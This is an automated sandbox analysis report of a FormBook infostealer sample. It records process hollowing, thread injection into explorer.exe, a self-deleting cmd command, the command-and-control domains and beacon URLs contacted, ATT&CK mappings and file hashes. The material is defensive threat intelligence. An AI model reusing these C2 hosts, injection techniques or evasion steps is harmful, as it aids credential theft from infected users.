          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E5F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04ECFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 7_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\583475.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.appsdeals14.com
          Source: C:\Windows\explorer.exe | Domain query: www.tinyhollywood.com
          Source: C:\Windows\explorer.exe | Network Connect: 68.66.224.28 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 9D0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\583475.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\583475.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\583475.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: A7E008
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\583475.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\583475.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\583475.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 00000009.00000000.742102073.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\583475.exe | Queries volume information: C:\Users\user\Desktop\583475.exe VolumeInformation
          Source: C:\Users\user\Desktop\583475.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Process Injection812 | Masquerading1 | OS Credential Dumping | Security Software Discovery121 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection812 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Files and Directories1 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 510246 | Sample: 583475.exe | Startdate: 27/10/2021 | Architecture: WINDOWS | Score: 100

Start (node 2)
  -> DNS/IP: www.eeeptou.xyz
  -> Signature: Found malware configuration
  -> Signature: Malicious sample detected (through community Yara rule)
  -> Signature: Yara detected FormBook
  -> Signature: 5 other signatures
  -> Process started: 583475.exe (15 4)

583475.exe (node 10)
  -> DNS/IP: www.google.com 142.250.185.228, 443, 49757 GOOGLEUS United States
  -> Dropped file: C:\Users\user\AppData\...\AddInProcess32.exe, PE32
  -> Dropped file: C:\Users\user\AppData\...\583475.exe.log, ASCII
  -> Signature: Writes to foreign memory regions
  -> Signature: Allocates memory in foreign processes
  -> Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
  -> Signature: Injects a PE file into a foreign processes
  -> Process started: AddInProcess32.exe

AddInProcess32.exe (node 15)
  -> Signature: Modifies the context of a thread in another process (thread injection)
  -> Signature: Maps a DLL or memory area into another process
  -> Signature: Sample uses process hollowing technique
  -> Signature: 2 other signatures
  -> Process started: cmstp.exe
  -> Process injected: explorer.exe
  -> Process started: autofmt.exe

cmstp.exe (node 18)
  -> Signature: Modifies the context of a thread in another process (thread injection)
  -> Signature: Maps a DLL or memory area into another process
  -> Signature: Tries to detect virtualization through RDTSC time measurements
  -> Process started: cmd.exe (1)

explorer.exe (node 21)
  -> DNS/IP: appsdeals14.com 68.66.224.28, 49835, 80 A2HOSTINGUS United States
  -> DNS/IP: www.tinyhollywood.com
  -> DNS/IP: 2 other IPs or domains
  -> Signature: System process connects to network (likely due to code injection or exploit)

cmd.exe (node 26)
  -> Process started: conhost.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
583475.exe | 100% | Joe Sandbox ML | -

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs | -

          Unpacked PE Files

Source | Detection | Scanner | Label
7.0.AddInProcess32.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.AddInProcess32.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.AddInProcess32.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
www.eeeptou.xyz/uat8/ | 0% | Avira URL Cloud | safe
http://ns.adobe.c/gE | 0% | Avira URL Cloud | safe
http://ns.adobe.cobj | 0% | URL Reputation | safe
http://ns.adobe.cobjE | 0% | Avira URL Cloud | safe
http://ns.ado/1E | 0% | Avira URL Cloud | safe
http://ns.d | 0% | URL Reputation | safe
http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD | 0% | Avira URL Cloud | safe
http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD | 0% | Avira URL Cloud | safe
http://ns.adobe.c/g | 0% | URL Reputation | safe
http://ns.ado/1 | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.eeeptou.xyz | 104.21.96.92 | true | true | - | unknown
tinyhollywood.com | 34.102.136.180 | true | false | - | unknown
www.google.com | 142.250.185.228 | true | false | - | high
appsdeals14.com | 68.66.224.28 | true | true | - | unknown
www.appsdeals14.com | unknown | unknown | true | - | unknown
www.tinyhollywood.com | unknown | unknown | true | - | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.eeeptou.xyz/uat8/ | true | Avira URL Cloud: safe | low
http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD | false | Avira URL Cloud: safe | unknown
http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD | true | Avira URL Cloud: safe | unknown
https://www.google.com/ | false | - | high

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp | false | - | high
http://ns.adobe.c/gE | 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.adobe.cobj | 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ns.adobe.cobjE | 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.ado/1E | 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.d | 583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ns.adobe.c/g | 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp | false | - | high
http://ns.ado/1 | 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.228 | www.google.com | United States | 15169 | GOOGLEUS | false
34.102.136.180 | tinyhollywood.com | United States | 15169 | GOOGLEUS | false
68.66.224.28 | appsdeals14.com | United States | 55293 | A2HOSTINGUS | true

                            General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510246
Start date: 27.10.2021
Start time: 16:28:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 0s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 583475.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/2@4/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.4% (good quality ratio 19.2%)
• Quality average: 71.4%
• Quality standard deviation: 32%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 131.253.33.200, 13.107.22.200, 20.82.209.183, 20.54.110.249, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235, 20.50.102.62
• Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
16:29:05 | API Interceptor | 212x Sleep call for process: 583475.exe modified

                            Joe Sandbox View / Context

                            IPs

Match | Associated Sample Name / URL | Detection | Context
68.66.224.28 | http://nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.html | malicious | nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.html

                            Domains

                            No context

                            ASN

Match | Associated Sample Name / URL | Detection | Context
A2HOSTINGUS | SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exe | malicious | 185.146.22.233
A2HOSTINGUS | PO_W4420211025#BULGARIA SAINT GOBAIN.exe | malicious | 185.146.22.233
A2HOSTINGUS | PO_W4420211025#BULGARIA SAINT GOBAIN.exe | malicious | 185.146.22.233
A2HOSTINGUS | Factura FAN CourierFAN Courier Invoice 7038848_pdf.exe | malicious | 185.146.22.233
A2HOSTINGUS | Scan_Documentsfile00384740599HFH4.exe | malicious | 85.187.132.177
A2HOSTINGUS | HTK TT600202109300860048866 Payment Proof.pdf.exe | malicious | 185.146.22.238
A2HOSTINGUS | SDL_Order Onay#U0131 _ Acil,pdf.exe | malicious | 70.32.23.53
A2HOSTINGUS | Progetto Plastisavio S.p.A. 19_10_2021_pdf.exe | malicious | 185.146.22.233
A2HOSTINGUS | jew.x86 | malicious | 68.66.210.7
A2HOSTINGUS | Schenker Italiana S.p.A. CW305.exe | malicious | 185.146.22.233
A2HOSTINGUS | PyZcDaysXO | malicious | 185.148.131.2
A2HOSTINGUS | Orden de compra n_ 393116209.exe | malicious | 185.146.22.233
A2HOSTINGUS | Update-KB250-x86.exe | malicious | 85.187.148.2
A2HOSTINGUS | Update-KB2984-x86.exe | malicious | 85.187.148.2
A2HOSTINGUS | test2.dll | malicious | 185.146.22.232
A2HOSTINGUS | doc.msg.exe | malicious | 85.187.148.2
A2HOSTINGUS | Confirm_Sept_Invoice.html | malicious | 68.66.226.75
A2HOSTINGUS | New_AMT_Policy.html | malicious | 68.66.226.75
A2HOSTINGUS | New_AMT_Policy.html | malicious | 68.66.226.75
A2HOSTINGUS | DOCUMENT TRK.doc | malicious | 85.187.128.246

                            JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
54328bd36c14bd82ddaa0c04b25ed9ad | TEaKKn2Dkf.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | Km5KAxQLLV.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | P.O_45030090VT_Glaserei_Gueney.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | mJ1frOovsp.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | PRODUCT ENQUIRY #20211027.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | IB5eMmKwbD.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | Duty invoice & clearance document.vbs | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | Shipment #45523666245.vbs | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | PO No-512 3111.vbs | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | IDSTATEMENTS.vbs | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | avocFyG.vbs | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | r18qGHf6vL.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | DHL_document11022020680908911.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | Goldschmidt_P.O_342044090VT.vbs | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | 36#U0443.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | ssjZo49L9R.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | S011814021275597.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | f25d7dae55dc8c848e9fed3f218f886f4ca4412e5b94a.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | 8cc8f28391efb0099a231da1df27d6acc2a9dbfdc11d5.exe | malicious | 142.250.185.228
54328bd36c14bd82ddaa0c04b25ed9ad | xmzY7ZAuZp.exe | malicious | 142.250.185.228

                            Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | NewOrderPDF.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | DHLExpress_Shipment101909.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Niki-Gmbh Germany Inquiry.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Enquiry MW886079 ( Flowstar.CO.UK ).exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Order18102021.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | DHL_Ship_152021.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | DO854.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | DrAlj265av.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | masa_prot.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 75lT7DuXrs.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | dark.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | tortilla.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | dark.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 2xYyRwsd4z.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | bNaLNMv3po.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | uUdLeF2vh0.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | DHL_Express1102021.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | VsRff7UbXL.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | DHL_Shipment_20210621.exe | malicious
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | SH_07391564.exe | malicious

                                                                    Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.log
Process: C:\Users\user\Desktop\583475.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1402
Entropy (8bit): 5.338819835253785
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKoesXE8:MIHK5HKXE1qHxvbHK5AHKzvRYHKhQnoe
MD5: 1B32E71ED0326337C6593D13A55E54F4
SHA1: 0452CD9E26B6C35A3D186FD6DDB1B3365AFDB16C
SHA-256: 047E61E1F57F4922CA346203710E828859BB61800D9A72C2E64092EBB218CCA8
SHA-512: 1B5BF6D43F14FFEC6A58366222F606CB9EA1781E9E4A7E6F340E9982DD82F296ACA693EA94105F78705C01D254A7B7897050C7289CC942122C7B83221CC15DAA
